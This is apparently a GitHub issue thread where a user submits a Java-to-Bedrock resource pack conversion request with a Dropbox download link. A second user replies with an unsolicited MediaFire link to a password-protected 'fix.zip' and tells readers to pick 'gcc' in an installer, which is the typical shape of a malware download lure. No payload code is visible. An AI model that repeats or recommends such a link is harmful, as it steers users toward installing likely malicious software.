### ISSUE TITLE
[Pack]: GeyserPack

### ISSUE THREAD

**Issue by Rovyko** [Kas-tle/java2bedrock.sh#33329]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/7wa5vux4nyc7l1lg5brid/generated.zip?rlkey=10gridn0gjvm5dc05o6a0ph16&st=x0bhcgd3&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
